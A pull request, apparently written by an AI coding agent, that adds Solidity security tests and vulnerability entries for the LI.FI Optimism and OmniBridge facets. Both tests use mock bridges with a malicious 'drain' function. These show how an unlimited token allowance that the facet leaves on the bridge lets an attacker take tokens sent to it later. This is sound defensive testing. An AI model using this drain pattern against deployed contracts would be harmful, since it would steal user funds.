### PR TITLE
Add allowance tests for Optimism and OmniBridge facets

### DIFF
--- a/TestedVectors.md
+++ b/TestedVectors.md
@@ -189,6 +189,11 @@
 - Test: `forge test --match-path test/solidity/Security/OptimismBridgeFacetZeroStandardBridge.t.sol`
 - Result: `initOptimism` accepts `standardBridge` as address(0); subsequent bridge attempts revert with "call to non-contract address", leaving the facet unusable.
 
+## OptimismBridgeFacet unlimited token allowance to bridge
+- Severity: High
+- Test: `forge test --match-path test/solidity/Security/OptimismBridgeFacetAllowance.t.sol`
+- Result: `startBridgeTokensViaOptimismBridge` leaves an unlimited allowance to the Optimism bridge, allowing a malicious bridge to drain tokens via `transferFrom`.
+
 ## ThorSwapFacet constructor allows zero router address
 - Severity: Medium
 - Test: `forge test --match-path test/solidity/Security/ThorSwapFacetZero.t.sol`
@@ -241,6 +246,11 @@
 - Severity: Medium
 - Test: `forge test --match-path test/solidity/Security/OmniBridgeFacetZero.t.sol`
 - Result: Contract deploys with zero `foreignOmniBridge` and `wethOmniBridge`, rendering bridging calls unusable as they revert.
+
+## OmniBridgeFacet unlimited token allowance to bridge
+- Severity: High
+- Test: `forge test --match-path test/solidity/Security/OmniBridgeFacetAllowance.t.sol`
+- Result: `startBridgeTokensViaOmniBridge` leaves an unlimited allowance to the OmniBridge, allowing a malicious bridge to drain tokens via `transferFrom`.
 
 ## GnosisBridgeFacet constructor rejects zero router address
 - Severity: Medium

--- a/test/solidity/Security/OmniBridgeFacetAllowance.t.sol
+++ b/test/solidity/Security/OmniBridgeFacetAllowance.t.sol
@@ -1,0 +1,70 @@
+// SPDX-License-Identifier: UNLICENSED
+pragma solidity ^0.8.17;
+
+import {Test} from "forge-std/Test.sol";
+import {MockERC20} from "solmate/test/utils/mocks/MockERC20.sol";
+import {OmniBridgeFacet} from "lifi/Facets/OmniBridgeFacet.sol";
+import {IOmniBridge} from "lifi/Interfaces/IOmniBridge.sol";
+import {ILiFi} from "lifi/Interfaces/ILiFi.sol";
+
+contract MockOmniBridge is IOmniBridge {
+    address public token;
+
+    constructor(address _token) {
+        token = _token;
+    }
+
+    function relayTokens(address, address, uint256 amount) external override {
+        MockERC20(token).transferFrom(msg.sender, address(this), amount);
+    }
+
+    function wrapAndRelayTokens(address) external payable override {}
+
+    // malicious helper to drain tokens using leftover allowance
+    function drain(address from, address to, uint256 amount) external {
+        MockERC20(token).transferFrom(from, to, amount);
+    }
+}
+
+contract OmniBridgeFacetAllowanceTest is Test {
+    MockERC20 internal token;
+    MockOmniBridge internal bridge;
+    OmniBridgeFacet internal facet;
+    address internal attacker = address(0xbeef);
+
+    function setUp() public {
+        token = new MockERC20("Mock", "MOCK", 18);
+        bridge = new MockOmniBridge(address(token));
+        facet = new OmniBridgeFacet(IOmniBridge(address(bridge)), IOmniBridge(address(bridge)));
+
+        token.mint(address(this), 100 ether);
+        token.approve(address(facet), type(uint256).max);
+    }
+
+    function test_UnlimitedAllowanceAllowsTokenDrain() public {
+        ILiFi.BridgeData memory bridgeData = ILiFi.BridgeData({
+            transactionId: bytes32("tx"),
+            bridge: "",
+            integrator: "",
+            referrer: address(0),
+            sendingAssetId: address(token),
+            receiver: address(0x1234),
+            minAmount: 10 ether,
+            destinationChainId: 100,
+            hasSourceSwaps: false,
+            hasDestinationCall: false
+        });
+
+        facet.startBridgeTokensViaOmniBridge(bridgeData);
+
+        // allowance remains max
+        assertEq(token.allowance(address(facet), address(bridge)), type(uint256).max);
+
+        // attacker drains tokens sent later to facet
+        token.mint(address(facet), 5 ether);
+        bridge.drain(address(facet), attacker, 5 ether);
+
+        assertEq(token.balanceOf(attacker), 5 ether);
+    }
+}
+

--- a/test/solidity/Security/OptimismBridgeFacetAllowance.t.sol
+++ b/test/solidity/Security/OptimismBridgeFacetAllowance.t.sol
@@ -1,0 +1,97 @@
+// SPDX-License-Identifier: UNLICENSED
+pragma solidity ^0.8.17;
+
+import {Test} from "forge-std/Test.sol";
+import {MockERC20} from "solmate/test/utils/mocks/MockERC20.sol";
+import {OptimismBridgeFacet} from "lifi/Facets/OptimismBridgeFacet.sol";
+import {IL1StandardBridge} from "lifi/Interfaces/IL1StandardBridge.sol";
+import {ILiFi} from "lifi/Interfaces/ILiFi.sol";
+import {LibDiamond} from "lifi/Libraries/LibDiamond.sol";
+
+contract MockStandardBridge is IL1StandardBridge {
+    address public token;
+
+    constructor(address _token) {
+        token = _token;
+    }
+
+    function depositETHTo(address, uint32, bytes calldata) external payable override {}
+
+    function depositERC20To(
+        address,
+        address,
+        address,
+        uint256 amount,
+        uint32,
+        bytes calldata
+    ) external override {
+        MockERC20(token).transferFrom(msg.sender, address(this), amount);
+    }
+
+    function depositTo(address, uint256 amount) external override {
+        MockERC20(token).transferFrom(msg.sender, address(this), amount);
+    }
+
+    // malicious helper to drain leftover allowance
+    function drain(address from, address to, uint256 amount) external {
+        MockERC20(token).transferFrom(from, to, amount);
+    }
+}
+
+contract TestOptimismFacet is OptimismBridgeFacet {
+    function initOwner() external {
+        LibDiamond.setContractOwner(msg.sender);
+    }
+}
+
+contract OptimismBridgeFacetAllowanceTest is Test {
+    MockERC20 internal token;
+    MockStandardBridge internal bridge;
+    TestOptimismFacet internal facet;
+    address internal attacker = address(0xbeef);
+
+    function setUp() public {
+        token = new MockERC20("Mock", "MOCK", 18);
+        bridge = new MockStandardBridge(address(token));
+        facet = new TestOptimismFacet();
+        facet.initOwner();
+        OptimismBridgeFacet.Config[] memory configs = new OptimismBridgeFacet.Config[](0);
+        facet.initOptimism(configs, IL1StandardBridge(address(bridge)));
+
+        token.mint(address(this), 100 ether);
+        token.approve(address(facet), type(uint256).max);
+    }
+
+    function test_UnlimitedAllowanceAllowsTokenDrain() public {
+        ILiFi.BridgeData memory bridgeData = ILiFi.BridgeData({
+            transactionId: bytes32("tx"),
+            bridge: "",
+            integrator: "",
+            referrer: address(0),
+            sendingAssetId: address(token),
+            receiver: address(0x1234),
+            minAmount: 10 ether,
+            destinationChainId: 10,
+            hasSourceSwaps: false,
+            hasDestinationCall: false
+        });
+
+        OptimismBridgeFacet.OptimismData memory optimism = OptimismBridgeFacet.OptimismData({
+            assetIdOnL2: address(0x5678),
+            l2Gas: 0,
+            isSynthetix: false
+        });
+
+        facet.startBridgeTokensViaOptimismBridge(bridgeData, optimism);
+
+        // allowance should remain max
+        assertEq(token.allowance(address(facet), address(bridge)), type(uint256).max);
+
+        // attacker drains tokens sent later to facet
+        token.mint(address(facet), 5 ether);
+        bridge.drain(address(facet), attacker, 5 ether);
+
+        assertEq(token.balanceOf(attacker), 5 ether);
+    }
+}
+


### PR DESCRIPTION
## Summary
- add test for unrestricted allowance left after Optimism bridge deposit
- add test for unlimited allowance left after OmniBridge deposit
- document new vulnerability vectors

## Testing
- `forge test --match-path test/solidity/Security/OptimismBridgeFacetAllowance.t.sol`
- `forge test --match-path test/solidity/Security/OmniBridgeFacetAllowance.t.sol`


------
https://chatgpt.com/codex/tasks/task_e_68ace7847bf8832d8af5b5be70e1c292